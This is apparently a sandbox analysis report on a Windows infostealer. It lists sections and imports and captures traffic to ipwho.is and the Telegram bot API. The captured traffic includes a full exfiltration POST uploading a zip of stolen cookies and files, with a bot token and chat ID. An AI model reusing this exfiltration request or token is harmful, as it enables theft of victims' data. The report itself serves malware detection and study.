                                      .data0x5190000x6f200x62008134a298a1419e24cdaa56b31e4d9614False0.41091358418367346data4.28387814324599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata0x5200000x148500x14a00d27f4caab6529c6dfe1916079dc1a9fcFalse0.4869554924242424data6.221562344961173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      _RDATA0x5350000x15c0x20006c074d6698e3a07b60ecedaea074193False0.408203125data3.30133477618048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x5360000x86900x88003f1e4d07439f66c364e78743f87a5010False0.26803768382352944data5.452811289047903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Imports

                                      DLLImport
                                      KERNEL32.DLLGetConsoleMode, WriteConsoleW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, GetCurrentProcess, ReleaseMutex, GetEnvironmentVariableW, GetModuleHandleW, FormatMessageW, GetTempPathW, SetFilePointerEx, GetFileInformationByHandleEx, GetFullPathNameW, FlushFileBuffers, FindNextFileW, CreateDirectoryW, FindFirstFileW, GetSystemInfo, WakeConditionVariable, GetStdHandle, SetFileCompletionNotificationModes, CreateIoCompletionPort, SetHandleInformation, TryAcquireSRWLockExclusive, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, GetCurrentProcessId, CreateNamedPipeW, CreateThread, ReadFileEx, SleepEx, WriteFileEx, ReleaseSRWLockExclusive, GetCurrentThread, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, GetProcAddress, QueryPerformanceFrequency, GetSystemTimeAsFileTime, GetCurrentDirectoryW, AcquireSRWLockShared, ReleaseSRWLockShared, DeleteFileW, LoadLibraryExW, SleepConditionVariableSRW, PostQueuedCompletionStatus, GetFinalPathNameByHandleW, SetLastError, GetQueuedCompletionStatusEx, WakeAllConditionVariable, GetModuleHandleA, SwitchToThread, CreateFileW, SetFileInformationByHandle, GetModuleFileNameW, HeapReAlloc, GetProcessHeap, HeapAlloc, Sleep, GetExitCodeProcess, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, MultiByteToWideChar, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, WaitForSingleObject, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetFileInformationByHandle, TerminateProcess, SetThreadStackGuarantee, AddVectoredExceptionHandler, CloseHandle, FindClose, QueryPerformanceCounter, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, GetLastError, AcquireSRWLockExclusive, HeapFree, EncodePointer, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CopyFileExW
                                      advapi32.dllAllocateAndInitializeSid, RegQueryValueExW, SystemFunction036, RegOpenKeyExW, FreeSid, RegCloseKey, CheckTokenMembership
                                      api-ms-win-crt-heap-l1-1-0.dll_msize, malloc, _set_new_mode, realloc, calloc, free
                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                      api-ms-win-crt-math-l1-1-0.dllexp2f, _dclass, log, roundf, pow, ceil, __setusermatherr, powf, truncf
                                      api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _seh_filter_exe, _initterm_e, _endthreadex, _register_onexit_function, _crt_atexit, _beginthreadex, abort, exit, _exit, terminate, __p___argc, _initialize_onexit_table, __p___argv, _initterm, _cexit, _c_exit, _set_app_type, _register_thread_local_exe_atexit_callback
                                      api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                      api-ms-win-crt-string-l1-1-0.dllstrlen, strncmp, strcspn, strcpy_s, strcmp, wcsncmp
                                      api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                      api-ms-win-crt-utility-l1-1-0.dll_rotl64, qsort
                                      bcrypt.dllBCryptCloseAlgorithmProvider, BCryptOpenAlgorithmProvider, BCryptGenRandom
                                      crypt32.dllCertDuplicateStore, CryptUnprotectData, CertFreeCertificateChain, CertDuplicateCertificateChain, CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertCloseStore, CertVerifyCertificateChainPolicy, CertGetCertificateChain, CertOpenStore, CertFreeCertificateContext
                                      gdi32.dllCreateCompatibleBitmap, SelectObject, SetStretchBltMode, StretchBlt, GetDIBits, GetObjectW, DeleteObject, GetDeviceCaps, CreateCompatibleDC, CreateDCW, DeleteDC
                                      ntdll.dllNtDeviceIoControlFile, NtCreateFile, RtlLookupFunctionEntry, RtlCaptureContext, RtlNtStatusToDosError, NtCancelIoFileEx, RtlUnwindEx, RtlPcToFileHeader, RtlVirtualUnwind
                                      ole32.dllCoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, CoInitializeEx
                                      oleaut32.dllSafeArrayDestroy, VariantClear, SafeArrayAccessData, SafeArrayGetUBound, SysAllocStringLen, SafeArrayUnaccessData, SysFreeString, SafeArrayGetLBound
                                      rstrtmgr.dllRmStartSession, RmRegisterResources, RmGetList
                                      secur32.dllDecryptMessage, ApplyControlToken, EncryptMessage, DeleteSecurityContext, FreeCredentialsHandle, AcquireCredentialsHandleA, QueryContextAttributesW, InitializeSecurityContextW, AcceptSecurityContext, FreeContextBuffer
                                      user32.dllGetMonitorInfoW, EnumDisplaySettingsExW, EnumDisplayMonitors
                                      ws2_32.dllioctlsocket, WSASocketW, getsockname, getpeername, setsockopt, WSAIoctl, socket, getaddrinfo, freeaddrinfo, WSAStartup, WSACleanup, WSAGetLastError, accept, closesocket, listen, bind, select, getsockopt, recv, send, WSASend, connect, shutdown

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jun 1, 2024 18:51:12.526699066 CEST4971080192.168.2.5195.201.57.90
                                      Jun 1, 2024 18:51:12.531625032 CEST8049710195.201.57.90192.168.2.5
                                      Jun 1, 2024 18:51:12.531725883 CEST4971080192.168.2.5195.201.57.90
                                      Jun 1, 2024 18:51:12.532978058 CEST4971080192.168.2.5195.201.57.90
                                      Jun 1, 2024 18:51:12.537878990 CEST8049710195.201.57.90192.168.2.5
                                      Jun 1, 2024 18:51:13.368062019 CEST8049710195.201.57.90192.168.2.5
                                      Jun 1, 2024 18:51:13.368649006 CEST4971080192.168.2.5195.201.57.90
                                      Jun 1, 2024 18:51:13.373979092 CEST8049710195.201.57.90192.168.2.5
                                      Jun 1, 2024 18:51:13.374039888 CEST4971080192.168.2.5195.201.57.90
                                      Jun 1, 2024 18:51:33.912511110 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:33.912530899 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:33.912938118 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:33.979383945 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:33.979413033 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.831829071 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.832129002 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.836935043 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.836951017 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.837332010 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.881673098 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908549070 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908617973 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.908703089 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908744097 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.908812046 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908852100 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.908879995 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908894062 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908931971 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.908941031 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909002066 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909023046 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909055948 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909089088 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909089088 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909100056 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909106970 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909106970 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909120083 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909132957 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909142017 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909157991 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909181118 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909204960 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909224033 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909238100 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909244061 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909256935 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909267902 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909302950 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909312963 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909324884 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909337044 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909351110 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909362078 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909394979 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909413099 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909415007 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909430027 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909454107 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909467936 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909481049 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909492016 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909523010 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909533978 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.909545898 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909581900 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909619093 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909630060 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909677982 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909706116 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909730911 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.909760952 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.912930012 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.912934065 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913017035 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913027048 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913065910 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913075924 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913083076 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913101912 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913117886 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913117886 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913131952 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913137913 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913146973 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913157940 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913182974 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913193941 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913207054 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913217068 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913247108 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913258076 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.913269043 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913304090 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913333893 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913361073 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913393021 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913425922 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913434982 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913448095 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.913479090 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.922746897 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.922889948 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.922914028 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.922946930 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.922965050 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.922977924 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.922997952 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.923019886 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923033953 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.923046112 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923084974 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.923090935 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923100948 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923119068 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.923146009 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923162937 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923192978 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923211098 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.923223972 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923235893 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923250914 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923290968 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923316956 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923336983 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.923336983 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.923374891 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:34.928280115 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.930885077 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:34.980537891 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:35.990721941 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:36.038587093 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:36.038604975 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:36.041595936 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:36.041621923 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:36.041801929 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:36.042258978 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:36.042365074 CEST44349711149.154.167.220192.168.2.5
                                      Jun 1, 2024 18:51:36.042457104 CEST49711443192.168.2.5149.154.167.220
                                      Jun 1, 2024 18:51:36.042457104 CEST49711443192.168.2.5149.154.167.220

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jun 1, 2024 18:51:12.513715982 CEST6427753192.168.2.51.1.1.1
                                      Jun 1, 2024 18:51:12.523109913 CEST53642771.1.1.1192.168.2.5
                                      Jun 1, 2024 18:51:33.550728083 CEST5063453192.168.2.51.1.1.1
                                      Jun 1, 2024 18:51:33.906915903 CEST53506341.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jun 1, 2024 18:51:12.513715982 CEST192.168.2.51.1.1.10x6e04Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                      Jun 1, 2024 18:51:33.550728083 CEST192.168.2.51.1.1.10xa37dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jun 1, 2024 18:51:12.523109913 CEST1.1.1.1192.168.2.50x6e04No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                      Jun 1, 2024 18:51:33.906915903 CEST1.1.1.1192.168.2.50xa37dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • api.telegram.org
                                      • ipwho.is

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549710195.201.57.90806176C:\Users\user\Desktop\cOQD62FceM.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 1, 2024 18:51:12.532978058 CEST59OUTGET /?output=json HTTP/1.1
                                      accept: */*
                                      host: ipwho.is
                                      Jun 1, 2024 18:51:13.368062019 CEST941INHTTP/1.1 200 OK
                                      Date: Sat, 01 Jun 2024 16:51:13 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Server: ipwhois
                                      Access-Control-Allow-Headers: *
                                      X-Robots-Tag: noindex
                                      Data Raw: 32 62 64 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 54 58 22 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 32 2e 37 37 36 36 36 34 32 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 37 39 36 39 38 37 39 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 37 35 32 30 31 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 73 22 [TRUNCATED]
                                      Data Ascii: 2bd{"ip":"173.254.250.91","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"QuadraNet, Inc","isp":"Quadranet Enterprises LLC","domain":""},"timezone":{"id":"America\/Chicago","abbr":"CDT","is_dst":true,"offset":-18000,"utc":"-05:00","current_time":"2024-06-01T11:51:13-05:00"}}0


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549711149.154.167.2204436176C:\Users\user\Desktop\cOQD62FceM.exe
                                      TimestampBytes transferredDirectionData
                                      2024-06-01 16:51:34 UTC1190OUTPOST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20E26RT4853%20(1280,%201024)%0AHWID:%205059308222394286%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\cOQD62FceM.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                      content-type: multipart/form-data; boundary=4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489a
                                      content-length: 980180
                                      accept: */*
                                      host: api.telegram.org
                                      2024-06-01 16:51:34 UTC15194OUTData Raw: 2d 2d 34 65 65 31 61 36 34 32 30 36 39 62 37 35 38 35 2d 34 30 64 33 32 37 36 32 32 30 39 30 35 64 39 63 2d 37 65 38 37 32 30 66 61 31 37 33 38 34 62 65 64 2d 37 39 38 66 34 63 65 36 32 35 38 31 34 38 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 a3 94 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 a3 94 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08
                                      Data Ascii: --4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489aContent-Disposition: form-data; name="document"; filename="[US]_173.254.250.91.zip"Content-Type: application/zipPKXAutofill/PKX
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: e6 85 92 c4 73 b3 cd fd 6c f3 c2 c8 bc 50 b6 79 6e b6 b9 9f 24 fe 2d 6c 03 10 11 bc 50 2d 79 51 d8 e6 f9 11 ff 79 6c f3 40 b6 01 90 c4 fd c2 3c 0f db fc 5b d9 e6 81 64 fe 43 d9 e6 5f 43 3c 2f db fc 47 51 9a 17 c4 36 92 78 a1 52 fc 67 52 36 5e 18 db fc 4b c4 b3 d9 e6 df cb 36 cf 4d e6 05 48 9e 9b 6d ee 27 89 17 46 36 cf 97 03 00 01 b6 79 51 d8 e6 5f 2b cc f3 65 1b db 48 e2 45 21 73 99 6d 9e 1f 19 6c f3 dc 24 61 9b e7 c7 36 92 f8 f7 b0 0d 40 91 00 b0 cd fd 24 41 1a 00 db d8 e6 81 24 91 99 dc 4f 12 00 92 b8 9f d2 dc cf 36 cf 4d 12 00 b6 79 7e 1a 46 12 61 90 84 00 db 00 d8 46 12 f7 b3 8d b9 22 05 61 70 26 f7 93 84 24 6c 43 1a db 00 44 04 92 b0 cd 03 d9 26 33 a9 b5 02 90 99 00 44 04 00 d3 34 d1 45 01 c0 34 00 6c 73 3f 49 00 d8 c6 36 00 92 90 c4 fd 64 b0 8d 6d
                                      Data Ascii: slPyn$-lP-yQyl@<[dC_C</GQ6xRgR6^K6MHm'F6yQ_+eHE!sml$a6@$A$O6My~FaF"ap&$lCD&3D4E4ls?I6dm
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 69 f6 5e fc 5b c9 c1 0b 63 9b ff 4c b6 79 61 82 17 9d 6d 6c 23 09 49 48 22 33 79 61 64 5e 64 b6 f9 8f 26 f3 2c b6 79 41 c2 5c 66 9b ff 48 b6 79 61 c4 bf 8f 6d 5e b8 e4 df 23 9a f8 f7 b0 cd 8b ca 36 ff 5a e2 85 b3 cd bf 87 d2 fc bb a4 f9 8f 60 1b db 00 48 e2 5f 2b cc b3 d8 e6 b9 89 7f 1b db bc 30 32 d8 e6 45 65 9b 17 45 98 17 89 78 e1 6c f3 40 b6 01 90 c4 03 d9 e6 81 6c 03 50 10 2f 8c cc 73 b0 cd 0b 63 9b 17 44 12 00 b6 b9 9f cc f3 b0 cd fd 32 93 88 00 c0 36 b6 91 04 80 6d 5e 10 49 00 c8 e6 81 6c f3 40 a5 14 6c 63 1b db d8 46 12 92 00 90 79 a1 6c 03 60 1b 49 dc cf 36 00 9e 1a 92 88 08 22 02 00 db d8 c6 36 92 78 20 db d8 46 12 97 d9 00 48 42 12 cf 4d e6 32 db d8 46 12 92 b0 4d 66 72 3f 49 48 e2 7e b6 b9 9f 6d 1e 48 12 b6 b9 9f 24 6c d3 5a 03 a0 94 82 24 6c
                                      Data Ascii: i^[cLyaml#IH"3yad^d&,yA\fHyam^#6Z`H_+02EeExl@lP/scD26m^Il@lcFyl`I6"6x FHBM2FMfr?IH~mH$lZ$l
